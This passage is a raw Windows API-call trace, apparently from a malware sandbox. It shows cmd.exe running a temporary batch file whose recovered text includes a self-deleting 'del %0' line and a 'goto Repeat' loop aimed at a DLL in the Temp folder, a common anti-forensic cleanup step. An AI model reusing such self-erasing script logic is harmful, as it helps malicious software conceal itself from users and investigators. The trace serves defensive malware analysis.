(_String1="cmd.exe", _String2="ENDLOCAL") returned -2 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="TITLE") returned -17 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="START") returned -16 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="DPATH") returned -1 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="KEYS") returned -8 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="MOVE") returned -10 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="PUSHD") returned -13 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="POPD") returned -13 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="ASSOC") returned 2 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="FTYPE") returned -3 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="BREAK") returned 1 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="COLOR") returned -2 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="MKLINK") returned -10 [0053.407] SetErrorMode (uMode=0x0) returned 0x0 [0053.407] SetErrorMode (uMode=0x1) returned 0x0 [0053.407] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x431870, lpFilePart=0x24f320 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x24f320*="Desktop") returned 0x20 [0053.407] SetErrorMode (uMode=0x0) returned 0x1 [0053.408] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0053.408] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0053.408] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0053.408] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.408] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x24f0bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f0bc) returned 0xffffffff [0053.408] GetLastError () returned 0x2 [0053.408] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\cmd.exe.*", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0xffffffff [0053.408] GetLastError () returned 0x2 [0053.408] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x24f09c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f09c) returned 0xffffffff [0053.408] GetLastError () returned 0x2 [0053.408] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.409] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x24f0bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24f0bc) returned 0x431a70 [0053.409] FindClose (in: hFindFile=0x431a70 | out: hFindFile=0x431a70) returned 1 [0053.409] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0053.409] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0053.409] GetConsoleTitleW (in: lpConsoleTitle=0x24f0ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0053.409] GetFileAttributesW (lpFileName="cmd.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop\\cmd.exe")) returned 0xffffffff [0053.409] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0053.409] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0053.409] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0053.409] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0053.409] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0053.409] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0053.409] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0053.409] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0053.409] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0053.409] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0053.409] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0053.409] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0053.409] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0053.409] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0053.409] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0053.409] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0053.409] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0053.409] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0053.409] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0053.409] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0053.409] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0053.409] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0053.409] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0053.409] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0053.409] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0053.409] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0053.409] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0053.409] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0053.409] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0053.409] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0053.409] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0053.410] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0053.410] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0053.410] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0053.410] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0053.410] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0053.410] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0053.410] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0053.410] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0053.410] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0053.410] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0053.410] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0053.410] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0053.410] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0053.410] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0053.410] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0053.410] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0053.410] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0053.410] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0053.410] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0053.410] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0053.410] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0053.410] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0053.410] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0053.410] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0053.410] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0053.410] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0053.410] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0053.410] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0053.410] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0053.410] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0053.410] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0053.410] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0053.410] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0053.410] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0053.410] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0053.410] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0053.410] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0053.410] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0053.410] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0053.410] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0053.410] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0053.410] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0053.410] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0053.410] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0053.410] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0053.410] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0053.410] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0053.410] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0053.410] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0053.410] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0053.410] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0053.411] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0053.411] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0053.411] _wcsicmp (_String1="cmd", _String2="FOR") returned -3 [0053.411] _wcsicmp (_String1="cmd", _String2="IF") returned -6 [0053.411] _wcsicmp (_String1="cmd", _String2="REM") returned -15 [0053.411] SetErrorMode (uMode=0x0) returned 0x0 [0053.411] SetErrorMode (uMode=0x1) returned 0x0 [0053.411] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x422b88, lpFilePart=0x24ec0c | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpFilePart=0x24ec0c*="Desktop") returned 0x20 [0053.411] SetErrorMode (uMode=0x0) returned 0x1 [0053.411] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0053.411] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0053.411] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0053.411] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.411] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x24e9a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e9a8) returned 0xffffffff [0053.411] GetLastError () returned 0x2 [0053.412] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\cmd.exe.*", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0xffffffff [0053.412] GetLastError () returned 0x2 [0053.412] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0xffffffff [0053.412] GetLastError () returned 0x2 [0053.412] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.412] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe", fInfoLevelId=0x1, lpFindFileData=0x24e9a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e9a8) returned 0x431e60 [0053.412] FindClose (in: hFindFile=0x431e60 | out: hFindFile=0x431e60) returned 1 [0053.412] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0053.412] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0053.412] GetConsoleTitleW (in: lpConsoleTitle=0x24ee80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0053.412] InitializeProcThreadAttributeList (in: lpAttributeList=0x24ed08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24edd0 | out: lpAttributeList=0x24ed08, lpSize=0x24edd0) returned 1 [0053.412] UpdateProcThreadAttribute (in: lpAttributeList=0x24ed08, dwFlags=0x0, Attribute=0x60001, lpValue=0x24edc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24ed08, lpPreviousValue=0x0) returned 1 [0053.412] GetStartupInfoW (in: lpStartupInfo=0x24ecc4 | out: lpStartupInfo=0x24ecc4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PSExecu", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0053.413] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0053.414] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0053.414] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0053.414] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0053.414] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0053.414] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0053.414] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0053.414] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0053.414] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c exit", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpStartupInfo=0x24ed64*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="cmd.exe /c exit", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24edb0 | out: lpCommandLine="cmd.exe /c exit", lpProcessInformation=0x24edb0*(hProcess=0x54, hThread=0x58, dwProcessId=0xd04, dwThreadId=0xd08)) returned 1 [0053.419] CloseHandle (hObject=0x58) returned 1 [0053.419] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0053.419] GetEnvironmentStringsW () returned 0x423e88* [0053.419] FreeEnvironmentStringsW (penv=0x423e88) returned 1 [0053.419] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0053.472] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x24eca4 | out: lpExitCode=0x24eca4*=0x0) returned 1 [0053.472] CloseHandle (hObject=0x54) returned 1 [0053.472] _vsnwprintf (in: _Buffer=0x24edec, _BufferCount=0x13, _Format="%08X", _ArgList=0x24ecb0 | out: _Buffer="00000000") returned 8 [0053.472] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0053.472] GetEnvironmentStringsW () returned 0x423e88* [0053.472] FreeEnvironmentStringsW (penv=0x423e88) returned 1 [0053.472] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0053.473] GetEnvironmentStringsW () returned 0x423e88* [0053.473] FreeEnvironmentStringsW (penv=0x423e88) returned 1 [0053.473] DeleteProcThreadAttributeList (in: lpAttributeList=0x24ed08 | out: lpAttributeList=0x24ed08) [0053.473] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.473] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0053.473] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.473] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0053.473] _get_osfhandle (_FileHandle=0) returned 0x3 [0053.473] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0053.473] SetConsoleInputExeNameW () returned 0x1 [0053.473] GetConsoleOutputCP () returned 0x1b5 [0053.473] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0053.473] SetThreadUILanguage (LangId=0x0) returned 0x409 [0053.473] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f524, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0053.473] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 3 [0053.474] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.474] SetFilePointer (in: hFile=0x54, lDistanceToMove=235, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xeb [0053.474] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.474] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xeb [0053.474] ReadFile (in: hFile=0x54, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f508, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f508*=0xa, lpOverlapped=0x0) returned 1 [0053.474] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e76640, cbMultiByte=10, lpWideCharStr=0x49e7c640, cchWideChar=8191 | out: lpWideCharStr="del %%0 \r\n exit\r\ns\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\" goto Repeat\r\n") returned 10 [0053.474] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.474] GetFileType (hFile=0x54) returned 0x1 [0053.474] _get_osfhandle (_FileHandle=3) returned 0x54 [0053.474] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xf5 [0053.475] _tell (_FileHandle=3) returned 245 [0053.475] _close (_FileHandle=3) returned 0 [0053.475] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f2dc | out: _Buffer="\r\n") returned 2 [0053.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.475] GetFileType (hFile=0x7) returned 0x2 [0053.475] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.475] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f29c | out: lpMode=0x24f29c) returned 1 [0053.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.475] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f2c8, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f2c8*=0x2) returned 1 [0053.475] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0053.475] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.476] _vsnwprintf (in: _Buffer=0x49e75e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24f2d8 | out: _Buffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 32 [0053.476] _vsnwprintf (in: _Buffer=0x49e75e80, _BufferCount=0x3de, _Format="%c", _ArgList=0x24f2d8 | out: _Buffer=">") returned 1 [0053.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.476] GetFileType (hFile=0x7) returned 0x2 [0053.476] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.476] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f2a0 | out: lpMode=0x24f2a0) returned 1 [0053.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.476] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e75e40*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x24f2cc, lpReserved=0x0 | out: lpBuffer=0x49e75e40*, lpNumberOfCharsWritten=0x24f2cc*=0x21) returned 1 [0053.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.476] GetFileType (hFile=0x7) returned 0x2 [0053.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.477] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f524 | out: lpMode=0x24f524) returned 1 [0053.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.477] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x42f368*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x24f550, lpReserved=0x0 | out: lpBuffer=0x42f368*, lpNumberOfCharsWritten=0x24f550*=0x3) returned 1 [0053.477] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f55c | out: _Buffer=" %0 ") returned 5 [0053.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.477] GetFileType (hFile=0x7) returned 0x2 [0053.477] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.477] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f51c | out: lpMode=0x24f51c) returned 1 [0053.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.477] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x24f548, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f548*=0x5) returned 1 [0053.477] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f57c | out: _Buffer="\r\n") returned 2 [0053.477] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.477] GetFileType (hFile=0x7) returned 0x2 [0053.478] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.478] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f53c | out: lpMode=0x24f53c) returned 1 [0053.478] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.478] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f568, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f568*=0x2) returned 1 [0053.478] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0053.478] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0053.478] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0053.478] GetConsoleTitleW (in: lpConsoleTitle=0x24f0ec, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0053.478] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x24eea4 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.478] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x24df34 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.478] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e164, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x24e168, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x24e164*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0053.479] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0053.479] GetFileAttributesW (lpFileName="%0" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop\\%0")) returned 0xffffffff [0053.479] GetLastError () returned 0x2 [0053.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x431ad0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.479] SetErrorMode (uMode=0x0) returned 0x0 [0053.479] SetErrorMode (uMode=0x1) returned 0x0 [0053.479] GetFullPathNameW (in: lpFileName="%0", nBufferLength=0x104, lpBuffer=0x24e588, lpFilePart=0x24e570 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\%0", lpFilePart=0x24e570*="%0") returned 0x23 [0053.479] SetErrorMode (uMode=0x0) returned 0x1 [0053.479] GetFileAttributesW (lpFileName="%0" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\desktop\\%0")) returned 0xffffffff [0053.479] 